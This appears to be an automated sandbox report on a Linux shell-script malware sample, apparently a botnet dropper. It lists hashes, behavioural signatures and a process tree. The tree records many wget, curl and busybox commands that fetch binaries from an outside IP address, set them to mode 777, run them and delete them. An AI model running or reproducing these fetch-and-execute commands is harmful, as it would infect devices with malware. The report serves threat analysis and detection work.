Analysis
-
max time kernel
138s -
max time network
143s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
-
Size
10KB
-
MD5
60c5521dc77c48a75842ba0dbc3fae7c
-
SHA1
9ddfd137b35be8207eb3889a9a93c23ce142e184
-
SHA256
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490
-
SHA512
da9d12e38093b4ed8181f08e6e568d784d062e018ee58f085668c97a33254dcbf2a1dbe9b2ac4098817bfa045b661fb905ef37999c6fe3019ca1e504eb192d6c
-
SSDEEP
192:jorwWDEg9skLEcnrq/7DlhMYDgAiSEg9sk+zjnrq/7DPMYDgAiA:juwWpEt9EdKKA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:736
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:741
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:744
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:750
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:764
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:774
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:775
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:787
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:812
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:822
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:828
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:844
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:865
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:876
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:882
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:888
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:894
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:900
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:906
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:912
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:918
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:924
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:930
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:936
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:942
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:948
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:954
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:960
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:966
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:972
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:978
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97